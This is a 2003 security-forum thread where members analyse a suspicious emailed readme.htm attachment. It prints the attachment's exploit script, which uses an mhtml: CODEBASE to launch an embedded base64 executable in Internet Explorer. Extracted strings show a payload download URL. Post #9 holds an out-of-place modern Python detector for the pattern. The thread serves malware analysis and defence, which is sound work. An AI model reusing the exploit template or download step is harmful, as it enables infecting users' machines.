-
July 27th, 2003, 02:40 PM
#1
Received A Strange File? Thoughts
Hi Guys,
Received a strange e-mail tonight..
Addressed as from Admin..
Subject: Newsletter
Attachment: Readme.zip (size 1.2k)
Message reads:
Hello , ++und3rtak3rs=email addy-removed++
New windows bug was detected , details in readme.htm file (attached) !
This is not spam ! , you get this letter because you are member of www.security.org
First: Security.ORG is a locksmiths' organisation.. (well that is what I turned up when I keyed the url) So why the f are they emailing a Windows Bug warning?
Second: I haven't subscribed to this mob's newsletters.. should I need to learn to pick locks better (mind they nearly had me..Glad I checked the Website out)
Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?
Next thought I would get my Offline machine to check the file..
The contents of the Zip file was "Readme.htm"
Viewing the contents of the file using the View feature in Winrar:
MIME-Version: 1.0
Content-Location:file:///aaa.exe
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
----64 or so lines removed--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<body bgcolor=black scroll=no><script>
function f()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
document.write('<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
setTimeout('f()',3000)</script>
great this wants to run an executable.. and it seems to be in the email?
am I right... anyone else seen this before?
Cheers
BTW.. I will see what happens when executed...
hmmm.. my security settings prevent the execution of Activex Controls..hmmm
perhaps I am glad I am not a locksmith...
I still wonder why I can't use Norton or McAfee to remove this flu I have..
"Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2003, 02:54 PM
#2
Hey, Would you mind posting the zip file for us to pick apart? Call me crazy, but I enjoy doing computers forensics and reverse engineering malware.
-
July 27th, 2003, 02:58 PM
#3
Member
What email account did you receive it arrive in? Was it a hotmail one by any chance? I'm sure you know what they're like.
By the looks of it somebody's trying to engineer you into running a trojan. That's my best guess. After all, for a bug warning, why would they need to run a message with an .exe? If they were trying to make a good impression and woo the world with their wonderful all singing all dancing warning, wouldn't they do it with JavaScript?
The whole thing screams out script kiddie, especially the black background and red writing, one who hasn't done their homework properly (security.org(!!)).
And yes it does look to be wanting to be loading it from the .htm file, or at least somewhere on the HDD, in a temp directory (where winzip would extract the .htm file to when you double click it, this is what the unescape(path) does, I think).
"Death is more universal than life; everyone dies but not everyone lives."
A. Sachs
-
July 27th, 2003, 02:59 PM
#4
I received a somewhat similar file a while back. I received it over irc and it was called 'mindjail.html'. (IRC-New trojan ?)
However the javascript in that file was not visible.
The script is recognized by norton antivirus as 'trojan.sefex'. *
It is a patched IE bug afaik originally discovered by the people of malware.com (http://www.malware.com/gulp.html if I am correct)
You could try to decode it by using UUDeview for Windows but the exe is probably UPXed.
You can of course try to unUPX it: http://upx.sourceforge.net
I would not recommend executing it on a production machine because it is probably a trojan.
* I think norton recognizes it because of the script because when I recreated a html file like that with a base 64 encoded 'hello world' program it got recognized as that trojan.
I hope this can be of any help.
Cheers
noODle
-
July 27th, 2003, 03:06 PM
#5
Here is the File,
When it executes it attempts to "Install" the aaa.exe also as mentioned in my other post.. I have a popup that says that the ActiveX Control is unable to run due to the security settings?
The message was received through my local ISP (my normal email account), hotmail and Yahoo are reserved for "handing out email addy's on the net"..best spam filter i use..
Have attached the file
Cheers
edit:
BTW: NAV.. reported nothing.. extracted the HTM file and scanned it separately.. clean..hmm am I jumpy? hmm virii under the bed..(instead of red's under the bed)
hmm that is where I should be..
"Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2003, 03:23 PM
#6
Unfortunately I have no testbox up at the moment.
Anyway I ran bintext on it and here is the output:
===================================
File pos Mem pos ID Text
======== ======= == ====
0000004D 0040004D 0 !This program cannot be run in DOS mode.
000001A8 004001A8 0 .text
000001D0 004001D0 0 .rdata
000001F7 004001F7 0 @.data
0000066A 0040206A 0 DeleteFileA
00000678 00402078 0 ExitProcess
00000686 00402086 0 GetProcAddress
00000698 00402098 0 LoadLibraryA
000006A8 004020A8 0 WinExec
000006B2 004020B2 0 lstrcatA
000006BE 004020BE 0 lstrcpynA
000006C8 004020C8 0 kernel32.dll
00000800 00403000 0 http://64.246.56.74/~caraoke/ksp.exe
00000825 00403025 0 mshex.exe
00000847 00403047 0 Download
===================================
The file did not get recognized as a trojan.
My first guess is that it will try to download the file from the URL^^, however the url did not exist.
-
July 27th, 2003, 03:35 PM
#7
well I ran a neotrace on http://64.246.56.74/~caraoke/ksp.exe and this is what I got:
Organization:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Domain Name: EV1.NET
Created on..............: Thu, Oct 29, 1998
Expires on..............: Thu, Oct 28, 2010
Record last updated on..: Wed, Apr 09, 2003
Administrative Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net
Technical Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net
Zone Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net
Domain servers in listed order:
NS2.EV1.NET 216.88.77.7
NS1.EV1.NET 216.88.76.6
-----------------------------------------------------------------------
OrgName: Everyones Internet, Inc.
OrgID: EVRY
Address: 2600 Southwest Frwy., Suite 500
City: Houston
StateProv: TX
PostalCode: 77098
Country: US
NetRange: 64.246.0.0 - 64.246.63.255
CIDR: 64.246.0.0/18
NetName: EVRY-BLK-9
NetHandle: NET-64-246-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.EV1.NET
NameServer: NS2.EV1.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-10-05
Updated: 2003-03-31
TechHandle: RW172-ARIN
TechName: Williams, Randy
TechPhone: +1-713-400-5400
TechEmail: admin@ev1.net
OrgTechHandle: RW172-ARIN
OrgTechName: Williams, Randy
OrgTechPhone: +1-713-400-5400
OrgTechEmail: admin@ev1.net
ARIN WHOIS database, last updated 2003-07-26 19:15
-------------------------------------------------------------------------
Name: rs-64-246-56-74.ev1.net
IP Address: 64.246.56.74
Location: Houston (29.761N, 95.361W)
Network: EVRY-BLK-9
Hope this helps a bit.
-
July 27th, 2003, 05:48 PM
#8
Senior Member
Well here's the html source that ends up being run in your browser, it's all relative though so I don't know if it would run different out of the email or if whoever made it wrote it like that and then forgot to change it when they sent it out...
<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:file://C:\suspect-file\readme.htm!file:///aaa.exe"></object>
Reality is the one who has it wrong, not you
-
July 27th, 2003, 06:15 PM
#9
Pecosian,
The html you pasted will execute the base64 encoded .exe that is in the html source (but left out by Und3ertak3r).
The purpose of files like these is to trick users into opening them. Because they have the .html extension people don't suspect it. This way you can plant a trojan on a user's box (providing they are using IE and have not patched their machine).
In one of the previous posts I linked to the original posted exploit finders.
Edit
Here is the securityfocus bid.
http://www.securityfocus.com/bid/6961
They state however that the bug has not been patched but to the best of my knowledge it has been patched (or at least partly) because the 'self-executing' hello world I created does not run on my Win2k *fully patched machine but does run on my unpatched XP.
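A defender-side check for the attachment pasted in #1 and the mechanism noODle explains in #9, added here as an example of my own (not code from the thread): it reads an .htm the way the thread does, looking for a MIME part located at an .exe, a base64 body that decodes to an MZ header, and an <object> whose CODEBASE uses the mhtml: scheme with the "!" part selector. The sample input, the stub payload and the function names are constructed assumptions, not the real file.

```python
import base64
import re

# Constructed sample modelled on the readme.htm pasted in post #1: a MIME part
# whose Content-Location names aaa.exe, its base64 body, then the <object> that
# points IE at "mhtml:<path>\readme.htm!file:///aaa.exe". Payload is a made-up stub.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 28  # 32-byte DOS header magic only, not a program
SAMPLE_HTM = (
    "MIME-Version: 1.0\n"
    "Content-Location:file:///aaa.exe\n"
    "Content-Transfer-Encoding: base64\n"
    + base64.b64encode(FAKE_EXE).decode() + "\n"
    "<body bgcolor=black scroll=no><script>\n"
    "function f(){s=document.URL;path=s.substr(0,s.lastIndexOf('\\\\'));"
    "document.write('<object classid=\"clsid:11111111-1111-1111-1111\" "
    "CODEBASE=\"mhtml:'+path+'\\\\readme.htm!file:///aaa.exe\"></object>')}\n"
    "setTimeout('f()',3000)</script>\n"
)
BENIGN_HTM = "<html><body><p>Newsletter: nothing to see here.</p></body></html>\n"
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat")


def analyse_htm(text: str) -> dict:
    text = text.replace("\r\n", "\n")
    f = {"exe_location": False, "mz_payload": False, "mhtml_codebase": False, "payload_bytes": 0}
    # 1. A MIME header that names an executable as the part's location.
    loc = re.search(r"^Content-Location:\s*(\S+)", text, re.I | re.M)
    if loc and loc.group(1).lower().endswith(EXEC_EXTS):
        f["exe_location"] = True
    # 2. Base64-looking lines: join, decode, and test for the MZ magic.
    b64 = "".join(re.findall(r"^[A-Za-z0-9+/]{16,}={0,2}$", text, re.M))
    if b64:
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:
            blob = b""
        f["payload_bytes"] = len(blob)
        f["mz_payload"] = blob[:2] == b"MZ"
    # 3. An <object> whose CODEBASE reaches a part inside the MHTML via "!".
    cb = re.search(r'codebase\s*=\s*"(mhtml:[^"]*)"', text, re.I)
    if cb and "!" in cb.group(1) and cb.group(1).lower().endswith(EXEC_EXTS):
        f["mhtml_codebase"] = True
    return f


def verdict(f: dict) -> str:
    hits = sum(f[k] for k in ("exe_location", "mz_payload", "mhtml_codebase"))
    if hits == 3:
        return "block: executable embedded in MHTML and launched via mhtml: CODEBASE"
    return "review: partial match" if hits else "clean"
```

Run it over the extracted .htm from the zip rather than the zip itself; a real sample will have many base64 lines, which the join handles.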
-
July 27th, 2003, 09:05 PM
#10
Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?
An attempt to get it through the mail server's rules (removing .exe, html mail etc) perhaps.
Any chance of posting the mail headers (with suitable changes to protect yourself) Tracking down mail is a hobby of mine.
Steve.
IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com